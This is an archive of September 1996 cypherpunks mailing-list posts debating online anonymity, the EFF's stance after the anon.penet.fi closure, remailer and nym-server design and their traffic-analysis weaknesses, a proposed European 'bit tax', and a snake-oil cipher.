Several EFF board members have experienced problems around anonymity. On the Well, there was an experiment in anonymity which ended poorly. I wasn't there so it's hard to critique it in hindsight. But it certainly convinced ex-EFF-board-member Stewart Brand of the dangers of anonymity.

Personally I'm in favor of anonymity. I've researched the Supreme Court cases that support it, and spoken on panels in favor of it. I frequently point out that postal mail and telephones are anonymous, and the world has not disintegrated. Part of what started the cypherpunks in the first place was the anonymous remailer game, in which some players tried to figure out who was passing notes to who, while the others tried to conduct transactions anonymously under their noses.

I was arrested at an airport a few weeks ago, and kept in custody for 2-1/2 hours, for refusing to identify myself (and failing to turn on my laptop on command!). If the ACLU is interested, I'd love to make a test case out of it. I think in America we have -- and should work to keep -- the right to travel within our borders without identifying ourselves or producing any kind of government "papers".

But I sure can tell you I got mad when someone "anonymously" punctured the tires of the car I was driving, for many weeks in a row. The hardest part was that I had no way to figure out WHY they were doing it -- there was no way to communicate with them. (Perhaps I should've painted a message on the tires...)
If you think the problem with anonymity is restricted to physical damage, think again; there are ways to do non-physical damage. "Outing" people who have secrets is one way; confronting people with ideas that they are unprepared to deal with is another. Not to mention theft of intellectual property, fraud, and other economic damage, that anonymity makes it harder to deter or punish.

Like free speech and democracy, anonymity comes with its drawbacks; it's just better than the alternatives. Personally I think each person should have the right to choose how much to identify themselves and how much to be anonymous, in each situation. Without losing their civil rights (like the right to travel, or to speak or publish).

John Gilmore

PS: I would counsel against the kind of false anonymity provided by the Finnish server, though. Providing information under the promise that it will "never be revealed or misused" is a lot more dangerous than never providing it at all. E.g. "Anonymous cash" that is really based on dossiers or account-numbers isn't anonymous at all. Even physical cash is getting easier to trace; the British government has been tracking money by serial numbers for years, with custom machines in the banks, to de-anonymize Irish freedom-fighters (oops, I mean terrorists). Anonymity is another area, like privacy, where changes from technology can make big social differences.

From unicorn at schloss.li Mon Sep 2 15:59:38 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Tue, 3 Sep 1996 06:59:38 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <19960902152515012.AAA179@Esther.edventure.com>
Message-ID:

On Mon, 2 Sep 1996, Esther Dyson wrote:

> At least you don't accuse me of being a Communist.

Without commenting on the question of intelligence agencies, far left and far right on this issue are fairly non-distinct.

> Esther Dyson Always make new mistakes!
> EDventure Holdings
>

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From tcmay at got.net Mon Sep 2 16:02:59 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 07:02:59 +0800
Subject: Silenced Machine Guns Are Safer Than TWA
Message-ID:

At 6:37 PM 9/2/96, Dave Harman OBC wrote:
>tcmay at got.net (Skippy) wrote:
>
>! At 4:33 AM 9/2/96, qut at netcom.com (Net God) wrote:
>!
>! >Contrary to popular fiction, ALL firearms have been permanently
>! >registered since the 1968 Gun Control Act. The media monopoly lies when
>! >they say the contrary.
>!
>! Nope. Gun sales between individuals without any paperwork were fully legal
>! in some places until recently (and may still be fully legal...I can only
>! speak of California).
>
>So? I was talking about NEW sales of firearms from license holders. Let's
>consider improving the future rather than preserving the past, shall
>we?

My apologies! I assumed when you wrote "since the 1968 Gun Control Act" you meant since the 1968 Gun Control Act. I did not realize that you translate "since the 1968 Gun Control Act" into "NEW sales of firearms."

Sorry. I'll consult my qut-dictionary more often.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 16:16:20 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Tue, 3 Sep 1996 07:16:20 +0800
Subject: Whistleblowing on the Internet
Message-ID: <01I90C52IMZ49JDDSI@mbcl.rutgers.edu>

There's also the point that some whistleblowing isn't exactly what some political groups would want to occur. For instance, opponents to unions such as myself aren't going to want a whistleblower to be able conveniently to report their exclusion from a job due to union membership.

-Allen

From: IN%"adam at homeport.org" "Adam Shostack" 27-AUG-1996 02:41:17.66
To: IN%"geoff at digidem.com"
CC: IN%"cypherpunks at toad.com"
Subj: RE: Whistleblowing on the Internet

Geoffrey Gussis wrote:

| Overall, I am quite surprised that there isn't a whistleblowing
| clearinghouse on the Internet; a site sponsored by a non-profit that lists
| email addresses and secure forms for sending anonymized email to those
| areas of the public and private sector that deal with whistleblowing. As
| the Internet is a great medium for information dissemination, and offers
| significant privacy advantages, I really expected to find much more.

Such a clearinghouse is what we call a fat target; something likely to attract attention since wiretapping it could be very useful to an organization that worried about having a whistleblower.

As such, the correct attitude towards whistleblowing is to use an anonymous remailer, and send to interested parties. That's how the AT&T deal that sunk the des phones and made clipper a household word was publicized; a member of the list(?) interested party sent a number of interesting documents through remailers to cypherpunks.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From deviant at pooh-corner.com Mon Sep 2 16:16:56 1996
From: deviant at pooh-corner.com (The Deviant)
Date: Tue, 3 Sep 1996 07:16:56 +0800
Subject: Cypherpunk Mailboxes?
In-Reply-To:
Message-ID:

On Mon, 2 Sep 1996, Mark M. wrote:

> Date: Mon, 2 Sep 1996 13:41:04 -0400 (EDT)
> From: "Mark M."
> Reply-To: cypherpunks at toad.com
> To: cypherpunks at toad.com
> Subject: Re: Cypherpunk Mailboxes?
>
> On Mon, 2 Sep 1996, William H. Geiger III wrote:
>
> > Hi,
> >
> > I have a thought for addressing the anon. problem.
> >
> > We could create a network of anonymous remailers with mailboxes. All
> > messages in the mailboxes are stored encrypted. No information about the
> > users is kept. Users would be given x K of mailbox space.
> >
> > We could use PGP keys for encrypting the messages. Each user would have his
> > own key pair for his anonymous mailbox. Any plain text messages received to
> > the server would be encrypted on receipt.
> >
> > Let the government's subpoena away. :)
> >
> > "Sorry we don't have user addresses, no I can't decrypt those messages
> > Senator."
> >
> > What do you think?
>
> The only problem is there has to be someway for users to retrieve their mail.
> The current nym server approach is to use an encrypted reply block to send a
> user new mail. This way the nym server doesn't know who the user is. If users
> have to actively retrieve their mail, then the feds could install a packet
> sniffer on the remailers net link to find out the real email address of an
> anonymous user.
>
> -- Mark
>
> PGP encrypted mail preferred.
> Key fingerprint = d61734f2800486ae6f79bfeb70f95348
> http://www.voicenet.com/~markm/

Hrmm.. perhaps there's a better way... such as having the user and the mail server negotiate a key (i don't really know the details of diffie-hellman or the like, so tell me if this isn't feasible), and have the encryption/decryption routines strip addresses, so that the person is only identifiable by their key... anybody see what i'm saying?

--Deviant
All extremists should be taken out and shot.
From tim at ora.com Mon Sep 2 16:17:36 1996
From: tim at ora.com (Tim O'Reilly)
Date: Tue, 3 Sep 1996 07:17:36 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To:
Message-ID: <199609022105.OAA03983@isla.west.ora.com>

John,

Your statements seem like a position I could sign up to as an official EFF position...

--
Tim O'Reilly @ O'Reilly & Associates, Inc.
Publishers of Nutshell Handbooks
103 Morris Street, Sebastopol, CA 95472
707-829-0515 ext 266, Fax 707-829-0104, tim at ora.com
Check out http://www.ora.com, http://website.ora.com, http://www.songline.com

From hallam at ai.mit.edu Mon Sep 2 16:21:33 1996
From: hallam at ai.mit.edu (Hallam-Baker)
Date: Tue, 3 Sep 1996 07:21:33 +0800
Subject: SCO giving free licenses to UNIX OpenServer
In-Reply-To: <5025qi$k65@life.ai.mit.edu>
Message-ID: <322B4E8E.41C6@ai.mit.edu>

Eric Murray wrote:
>
> Scottauge at aol.com writes:
> > Read, Understand, and Delight... Microsoft maybe in trouble at last.
>
> I doubt it. People don't use Microsoft products because
> of their quality or functionality.

Errmm.. hate to disappoint but SCO UNIX started life as Xenix which was written by Microsoft in the dark ages.

> > This is for single user home based UNIX systems.
>
> Single-user UNIX isn't all that useful.

Multi-user ain't much better. Listen to the guys who built it. UNIX is a program development environment. In the early years it was interesting because there was source available, that ceased to be the case years ago.

Today Linux probably represents the future of the UNIX family, it allows people who want to hack at the OS level access to the sources of a fully functioning OS. This allows people to add in new kernel features, schedulers and other exotica without having to write a whole new O/S.

Just don't confuse it with "home computing", this is geek computing and you better have a lot of interest in computing to use it.
Home computing is the market for users who need a system that's simpler than a VCR or they can't use it. At one time that meant Apple, today it means Microsoft, it will never mean Linux - not unless someone can make Linux much much simpler than it is at present and provide decent WYSIWYG tools such as editors etc. designed for use by aunt Ethel.

Phill

From nobody at cypherpunks.ca Mon Sep 2 16:44:09 1996
From: nobody at cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 3 Sep 1996 07:44:09 +0800
Subject: strengthening remailer protocols
In-Reply-To: <9608231805.AA01523@clare.risley.aeat.co.uk>
Message-ID: <199609022125.OAA17259@abraham.cs.berkeley.edu>

I don't really see the use of this complicated scheme. The main problem seems to be that if M floods remailer R with messages to B, and A sends a message to C through R, then it will be clear to M that A's message was destined for C.

Rather than divert messages, then, I propose that for each input message there is a 10% chance that a piece of cover traffic is generated. Thus, if M sends 50 messages through R and sees 6 outgoing messages going to remailers C, D, and D, he will now know which messages correspond to the message that A sent through.

From mix-admin at nym.alias.net Mon Sep 2 18:06:48 1996
From: mix-admin at nym.alias.net (lcs Remailer Administrator)
Date: Tue, 3 Sep 1996 09:06:48 +0800
Subject: Too few nymservers
In-Reply-To: <199609021918.VAA21564@basement.replay.com>
Message-ID: <199609022157.RAA01689@anon.lcs.mit.edu>

> [snip]
> > There has to be more crypto anonymizing aliasing remailers and with
> > easier interfaces. Closing the Kleinpaste derived server will help
> > put the pressure of demand to start better remailer systems.
> > There's not enough capacity and reliability with the servers extant.
> > There should be thousands of full featured remailers.
>
> Exactly. Sometimes *all* the nymservers are down at the same time.
Well, I just designed a nymserver that's probably more complicated and difficult to use than any previous one. From this experience, I have concluded that if you want to design a remailer with real security (as opposed to a penet-style server), it just won't be easy to use that remailer manually. Even alpha.c2.org was kind of a pain to use manually.

I therefore think in the long run it's better to bite the bullet, write as secure a nym server as possible, and expect that people will use special client software to use the remailer.

Incidentally, if anyone else wants to run another nym.alias.net-style remailer, the code is available and I'd be glad to help anyone set things up if that person is serious about running a nymserver.

From paul at fatmans.demon.co.uk Mon Sep 2 18:11:51 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Tue, 3 Sep 1996 09:11:51 +0800
Subject: New cryptography www site
Message-ID: <841692280.5131.0@fatmans.demon.co.uk>

Hi all,

Just announcing my cryptography www site, it's very new so the content isn't all there yet but it's worth a look, email me and tell me what you think, also if anyone has any research papers on cryptography in ASCII, doc etc.. formats could they email them to me for putting on the pages...
the URL is Http://www.fatmans.demon.co.uk/crypt/index.htm

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don't forget to mount a scratch monkey"

From spg at dds.nl Mon Sep 2 18:28:28 1996
From: spg at dds.nl (SPG)
Date: Tue, 3 Sep 1996 09:28:28 +0800
Subject: FWD: Another try to kill democracy
Message-ID: <322B5766.60F8C2BB@dds.nl>

Hi Y'all,

I just got wind that the German government is planning to force german ISP's to shut off access to my ISP, XS4ALL, because the german magazine 'Radikal' has a web page on xs4all. This magazine is a radical left wing magazine of the type that in the netherlands is 13 in a dozen, and in germany (obviously) labelled 'terrorist'.

The issue here is not my political beliefs (quite distant from radical I can assure you) but the fact that the german government does NOT see fit to extradite nazi war criminals, to fire Judges, DA's and other powerful officials who were members of the nazi party during WW2, or to take steps towards closing access to US neo-nazi sites, but DOES deem it necessary to shut off an entire server because of a (in the netherlands perfectly legal) left wing magazine. Not so much is changed after all I guess.

As a student of history I can name several people also labelled 'terrorist' before by a government, who were not. 'Terrorist' is the name oppressive and undemocratic Junta's use for their opposition.

Please consider mirroring or linking to this site. THIS IS A MATTER OF PRINCIPLE!!
It has little to do with the actual content of the page (which is quite harmless)

URL: http://www.xs4all.nl/~tank/radikal/index.htm or contact tank at xs4all.nl

REMEMBER! NEXT OPINION LABELLED 'UNWANTED' BY A GOVERNMENT, MAY BE YOURS!!

Greetz. DD.

--
--__+==[ NOTE!! This e-mail address is read by several different people, due to the fact that it is in use as mailing address for our editorial staff (TRIBE MAGAZINE), If your message is of a personal nature, and is not to be reposted or used in our magazine , please state so. NOTE: we maintain the right to ignore this, if it has news value. ]==+--__

From jimbell at pacifier.com Mon Sep 2 18:31:01 1996
From: jimbell at pacifier.com (jim bell)
Date: Tue, 3 Sep 1996 09:31:01 +0800
Subject: "Bit Tax" article in EET
Message-ID: <199609022015.NAA09677@mail.pacifier.com>

August 26, 1996, Electronics Engineering Times, Page 4

"Europe wary of bit tax"
By Peter Clarke

Maastricht, Netherlands

Since it surfaced in a report prepared for the European Commission earlier this year (see April 29, page 1) the idea of a "bit tax" on data communications has received a mixed response in Europe.

Feedback has ranged from calls for adoption and implementation from within the Belgian government, to a qualified rejection by one vice president of the European Commission (EC), to disgust and disbelief amongst individual Internet users, particularly in Italy.

The bit tax idea, only a very minor part of an interim report, has received a great deal of publicity from private individuals, who seem to be the most upset, fearing state interference as an attempt to tax freedom of speech.

Luc Soete, director of the Maastricht Economics Research Institute on Innovation and Technology, has been heavily flamed via e-mail since the report's publication.
As chairman of the so-called High Level Experts Group (HLEG) which authored the report, it was he who included just one clause in about 100 pages of text, calling for an investigation of the taxing of data transmission over networks, and particularly over the internet.

[JB: I can't resist adding a comment here. One of the most threatening aspects of this "bit tax" idea (even far more important than the value of the money paid) is the fact that it would make all ISP's and Internet users automatically subject to "tax evasion" charges which would just be a smokescreen for content investigation, and would automatically "justify" wiretaps where content-based investigation would be impossible. It is very likely that threatening an ISP with such charges would cause him to become more cooperative, and the difficulty in calculating and verifying the accuracy of the taxes paid would make everyone an inadvertent criminal, which would give the government enormous leverage it wouldn't otherwise have. The way I see it, anyone who values freedom who would otherwise support a bit-tax-type proposal should run into a brick wall with this problem, and join the opposition to it right here.]

Speaking at a conference on telecommuting, the Belgian Minister for Telecommunications, Elio Di Ruppo, came out as a supporter of the bit tax. But the Flemish government, which is responsible for half of Belgium, claims a bit tax would undermine its efforts in promoting information technology within its territory.

The report was prepared for DG-V, the department of the EC responsible for social affairs, but Martin Bangemann, the EC vice president who heads up DG-XIII and is responsible for information technology and telecommunications, has expressed concern over the impact of a bit tax. Issues include economic growth and roll out of next-generation information and communications technologies and how a bit tax could be implemented.
The EC's official position on the bit tax is that it has no position. "This is only an interim report at the moment," said a spokesman for the DG-V. "The bit tax idea may not even be present in the final report."

Not Possible?

"The big problem is that it's a nice idea, but implementation may not be possible at the European level," the spokesman continued. "It may have to be set at the world level. At the moment, we are waiting for the final report."

Official responses to the interim report, from government and industry bodies, have been generally favorable but often don't mention the bit tax, Soete said. "The bit tax responses have been much more individual. It just goes to show that people don't read reports, but they do read newspapers."

Soete continued: "E-mail responses have been very offensive, very negative." Reluctant to give examples, Soete admitted that many e-mail messages had attacked him personally but that the gist was "keep your hands off the Internet."

Those responses, as well as more cogent arguments put forward, have prompted Soete to publish a second paper, titled: "The bit tax: the case for further research." In this, Soete has recast the bit tax as a replacement for the value-added tax (VAT) on information-technology goods and services, rather than as an additional tax. "There was an issue of double taxation there, which it is hard to justify," he said.

VAT is a European-wide system of taxation on consumption roughly equivalent to the US sales-tax system: It is typically set at 17.5 percent of the untaxed value. Soete argued that VAT is heavily based on ideas of material inputs at different states through a chain of manufacture and is not well-suited to "intangible" services.

He pointed out that a telephone call is currently priced and taxed in relation to the distance and time. Instead, Soete proposes the bit or byte--rather than the second--as the fundamental unit of measure.
Taxation on that basis might save small-scale users money while increasing the tax burden on large-scale users. "This is a new system of communications, and the assumption that we should be able to use it without any taxation is ridiculous," Soete said. As planned, the HLEG will rewrite its report in light of responses and further research by the end of 1996 before submitting it to DG-V, which is then expected to call for some of the particular recommendations to be investigated in 1997. [end of article] Jim Bell jimbell at pacifier.com From um at c2.org Mon Sep 2 18:31:22 1996 From: um at c2.org (Ulf Moeller) Date: Tue, 3 Sep 1996 09:31:22 +0800 Subject: EFF chairwoman: Anonymity proven not to be a positive factor Message-ID: >From a Scientology magazine: Esther Dyson, member of the board of directors of the Electronic Frontier Foundation and member of the National Information Infrastructure Advisory Council, spoke on the anonymity issue at the fifth Computers, Freedom & Privacy (CFP) conference in San Francisco. [...] "I have a concern about the spread of bad behavior on the Net," said Dyson. "Anonymity figures into this, and I feel that it has proven to not be a positive factor. It breaks down the community which we are seeking to build, and cout protection and privacy laws already exist and should be applied in a broad way, such that they are transparent to new wrinkles in the technology. It is not necessary to view the world of the Net as different from the rest of the world." http://www.anonymizer.com:8080/http://www.theta.com/goodman/hijack.htm [For EFF's former position on anonymity, see http://ftp.sterling.com:80/COAST/doc/law+ethics/EFF-Anonymity] From molnard1 at nevada.edu Mon Sep 2 18:47:26 1996 From: molnard1 at nevada.edu (DAVID A MOLNAR) Date: Tue, 3 Sep 1996 09:47:26 +0800 Subject: Question re: MD5/other key-crunching methods Message-ID: On the plane back home, I had the pleasure of being treated to a screening of "Sgt. Bilko". 
Not a bad movie overall, but had a nice throwaway crypto line. It got me to thinking, though...

Is it possible to make generalizations about the MD5 hashes of classes of input values? That is, can one say that "no input values of length greater than 512 bits will..." or "all input values starting with the value 3 have a tendency to..." with any degree of probability? I know hash functions strive to evenly distribute values over their range, but I wonder if it might sometimes be possible to predict the hash of a value without computing it.

Why? Well, it's mainly in regards to the way MD5 and other hash functions are used in mapping pass phrases to actual key values for a cipher. Suppose I have a situation in which I feel comfortable in making certain generalizations about the passphrase. Perhaps it's all lowercase, perhaps all alphanumeric, has five hyphens, whatever. Information which may allow one to restrict the passphrase to a certain range. In a system where the passphrase is the encryption key, that range of key values can be doled out and searched sequentially. Since they are likely to be one or several contiguous blocks, one may simply distribute the task of searching each one to willing machines everywhere. The efforts with respect to RC4-40 in the previous year prove that much. If I can rule out even 10% of all possible keyvalues, I've saved a good deal of time.

What if one is dealing with a passphrase key-crunched w/MD5, though? The obvious way to go about it is to compute the MD5 hash for each and every value in the given range, then test that set of keys. This is an extra step, and adds a measure of extra time to the whole operation. Sure, one may abstract it away by claiming it's trivial compared to the problem of searching an exponentially large keyspace, but that seems something of a cop-out. Perhaps it's a silly question, but is it possible to identify a set of hashes which correspond to a set of domain values w/o performing the hash itself?
I'm aware that it's not possible to reverse a one-way hash like MD5 (wish we could...what a compression ratio!), and I know "good" hash functions strive for properties which would make this exceedingly difficult. However, has anyone looked at the question? Is it worth considering? Thanks. -David Molnar From unicorn at schloss.li Mon Sep 2 18:53:07 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 3 Sep 1996 09:53:07 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609022132.OAA16572@eff.org> Message-ID: On Mon, 2 Sep 1996, Stanton McCandlish wrote: > > > What is or is not your personal or EFF's official position is meaningless. > > > It is clear that the personal beliefs of those involved in EFF are > > > those of compromise, present day politics, and a general lack of moral > > > fiber. > > But that's not clear at all, since none of you have access to internal > discussion on this or any other topic here. Esther's position is one of > guarded caution. Our former board member David Johnson's was one of > almost complete anti-anonymity (a fact that probably had a lot to do with > his leaving the board), while other board and staff members are 100% > pro-anonymity, and yet others are middleground or entirely silent on the > topic. Why am I any more mistaken for pointing out that a single influential member of EFF's staff or board is anti-anonymity and yet remains with the organization than you are for pointing out that a single influential member who happened to be anti-anonymity has left? If my position, as you represent, is misguided, surely your point about Mr. Johnson is equally so. If the board is almost 100% pro-anonymity, where's the official position? In so far as an organization is much defined by those involved, I think it entirely right to wonder aloud about the personal motives of the staff and board. I think this PARTICULARLY prudent given EFF's reputation and prior conduct. 
I would be most happy to be proven wrong and see EFF suddenly, in a burst of impressive moral fiber, speak out publically and take some political action to assure anonymous communication. > > Things simply are not as black and white as they might seem. > Well, let's have a clear official position issued then to end all dispute. > > I agree with you whole-heartedly. I am stunned by the EFF's position on > > this matter and they no longer have my support. Here are some more > > of Dyson's statements on this subject. > > You've not been reading very carefully. There is no "EFF's position on > this matter". There is just Esther Dyson's position on this matter, > and quoted out of context. Maybe there should be an EFF position on the matter. What is EFF doing if not supporting anonyminity? I'm hardly going to support an organization that proports to be pro-internet freedom and yet has no official position on anonyminity. Of course you should expect people to wonder about EFF when you have no official position and yet some staff and board members seem to have a statist bent. > -- > Stanton McCandlish >
mech at eff.org > Electronic Frontier Foundation > Online Activist
-- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li

From MAILER-DAEMON at mqg-smtp3.usmc.mil Mon Sep 2 18:59:07 1996 From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil) Date: Tue, 3 Sep 1996 09:59:07 +0800 Subject: Undeliverable Message Message-ID: To: Cc: Subject: Re: Cypherpunk Mailboxes? Message not delivered to recipients below. Press F1 for help with VNM error codes. VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER VNM3043 -- MAILBOX IS FULL The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered. The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER). When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages.

On Mon, 2 Sep 1996, William H. Geiger III wrote: > Hi, > > I have a thought for addressing the anon. problem. > > We could create a network of anonymous remailers with mailboxes. All > messages in the mailboxes are stored encrypted. No information about the > users is kept. Users would be given x K of mailbox space. > > We could use PGP keys for encrypting the messages. Each user would have his > own key pair for his anonymous mailbox. Any plain text messages received to > the server would be encrypted on receipt. > > Let the government's subpoena away. :) > > "Sorry we don't have user addresses, no I can't decrypt those messages > Senator." > > What do you think?

The only problem is there has to be some way for users to retrieve their mail. The current nym server approach is to use an encrypted reply block to send a user new mail. This way the nym server doesn't know who the user is. If users have to actively retrieve their mail, then the feds could install a packet sniffer on the remailer's net link to find out the real email address of an anonymous user.

-- Mark PGP encrypted mail preferred. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/

From jya at pipeline.com Mon Sep 2 19:03:31 1996 From: jya at pipeline.com (John Young) Date: Tue, 3 Sep 1996 10:03:31 +0800 Subject: FWD: Another try to kill democracy Message-ID: <199609022352.XAA09328@pipe5.t1.usa.pipeline.com>

On Sep 02, 1996 21:53:42, 'SPG ' wrote: >As student history I can name several people also labelled 'terrorist' before >by a government, who were not. 'Terrorist' is the name oppressive and >undemocratic Junta's use for their opposition.

--------- From the US journal "Foreign Affairs," Sep/Oct, 1996: Postmodern Terrorism Since 1900, terrorists' motivation, strategy, and weapons have changed to some extent. The anarchists and the left-wing terrorist groups that succeeded them, down through the Red Armies that operated in Germany, Italy, and Japan in the 1970s, have vanished; if anything, the initiative has passed to the extreme right. Governments and media in other countries do not wish to offend terrorists by calling them terrorists.
The French and British press would not dream of referring to their countries' native terrorists by any other name but call terrorists in other nations militants, activists, national liberation fighters, or even "gun persons." ---------- For the full 30kb essay see: http://jya.com/pothot.txt From jamesd at echeque.com Mon Sep 2 19:03:59 1996 From: jamesd at echeque.com (James A. Donald) Date: Tue, 3 Sep 1996 10:03:59 +0800 Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd) Message-ID: <199609021945.MAA05331@dns2.noc.best.net> At 09:04 PM 9/1/96 -0400, Alan Horowitz wrote: > The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone. > > If my memory serves, the Iranian jetliner had its squawker turned off, or > broken. Your memory does not serve: The computers record of the events was: Computer tells crew: Civilian jetliner on radar. Crew expecting an attack by jetfighters, tell computer to shoot it down. Computer does not put up a bunch of dialogs saying: "Hey, I think this is a CIVILIAN airliner, did you get that CIVILIAN airliner, are you quite sure you want it shot down? Instead it just shoots it down. Human error by the American military. Possibly poor user interface on the computer. Possibly indifference to civilian lives by the American military. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From wb8foz at nrk.com Mon Sep 2 19:14:18 1996 From: wb8foz at nrk.com (David Lesher) Date: Tue, 3 Sep 1996 10:14:18 +0800 Subject: [NOISE] Re: FLT 800: From the Rumor Mill... In-Reply-To: <199609020352.FAA29463@basement.replay.com> Message-ID: <199609022357.TAA06324@nrk.com> Anonymous sez: > > > Well, not quite the same situation. 
IIRC, the Iranian aircraft refused to resp > > The Iranian Airbus was also flying out of what was essentially "hostile" airsp > > Feel free to correct my memory if I'm wrong. I wish I had an off-list way to say this: Mr Anonymous: won't you please fix your posting s/w so it break lines correctly? It's a Royal PITA to deal with as it is.... Often I do want to read your comments, but when you make it a hassle... (I now return to the flame war already in progress...) -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From stewarts at ix.netcom.com Mon Sep 2 19:18:54 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 10:18:54 +0800 Subject: Pseudocrypto detector is going wild (was: Re: ALPHACIPHER - An unbreakable encryption program.) Message-ID: <199609030003.RAA03934@toad.com> C Matthew Curtin posted a reference to ALPHACIPHER, which appears to be Yet Another Snake Oil System. It's got good intentions - it uses (ahem) "one-time pads", and tries to build a convenient user interface for low-volume work. Of course, it apparently doesn't quite get it: > ALPHACIPHER uses key sets generated by a > proprietary random key set generator > to insure the production of unique, high-quality keys. The key set generation is inherently part of the encryption process; since it's proprietary, it's not possible to test the quality of the random numbers, but they must be assumed to be low-quality crackable stuff unless the author is willing to reveal the algorithm and demonstrate otherwise. The program is written in DOS, and produces its output as UPPERCASE LETTERS to avoid being caught by eavesdropping scanners that might detect other patterns. Not unreasonable, I guess. 
The author, Wolfgang Hammersmith, also wrote The New ADFGVX, a cypher that can be done by hand (if necessary), which he does acknowledge is breakable, but comments that for short messages, there may not be enough information to break it. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From tcmay at got.net Mon Sep 2 19:19:17 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 10:19:17 +0800 Subject: strengthening remailer protocols Message-ID: At 9:25 PM 9/2/96, John Anonymous MacDonald wrote: >I don't really see the use of this complicated scheme. The main >problem seems to be that if M floods remailer R with messages to B, >and A sends a message to C through R, then it will be clear to M that >A's message was destined for C. > >Rather than divert messages, then, I propose that for each input >message there is a 10% chance that a piece of cover traffic is >generated. Thus, if M sends 50 messages through R and sees 6 outgoing >messages going to remailers C, D, and D, he will now know which >messages correspond to the message that A send through. This type of attack is why "reply-block" schemes are fundamentally flawed. Any such scheme gives an attacker (a traffic analyst) a wedge with which to deduce mappings. It is a kind of "chosen plaintext" attack (loosely speaking). Or a "forcing attack." Maybe a "flooding attack" is as good a name as any. One floods the reply block and simply watches where the water goes. (If there were more academics in the crypto community looking at digital mix issues, there would likely be clever names for the various attacks.) Several folks on this list, including (from memory), Scott Collins, Wei Dai, Hal Finney, myself, and others, have noted this weakness over the years. Note that merely fiddling around with probabilities of transmission, such as described above, will not be enough. 
This just adds a layer of noise, which will disappear under a correlation analysis. (For newcomers, there are interesting parallels between statistical analysis of ciphers and similar analysis of remailer networks. And lots of statistical tools can be used to deduce likely mappings based on source/sink correlations, digram analysis, etc. Making a remailer network robust against such analyses will take a whole more basic thinking. Merely increasing message volume is not enough. Nor is increasing latency enough. Generally speaking, of course.) Instead of reply blocks, I think use of message pools (a la BlackNet) is a more robust reply method, as it uses "widely-distributed messages" (a la Usenet newsgroups) to get around the source/sink correlation issue. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From ghio at netcom.com Mon Sep 2 20:02:45 1996 From: ghio at netcom.com (Matthew Ghio) Date: Tue, 3 Sep 1996 11:02:45 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <199609011922.OAA31806@manifold.algebra.com> Message-ID: <199609022129.OAA02339@myriad> Someone wrote: : ! > I remember the load on anon.penet.fi was something like 7500 messages : ! > daily. As for connection, you will need 64kbps line or even less in case : ! > you compress the messages. The machine could be either an older Sun Sparc : ! > or a PC running free Unix (Linux/FreeBSD/...) anon.penet.fi actually used a 486/66 running FreeBSD. Dave Harman OBC (qut at netcom.com) wrote: : ! 
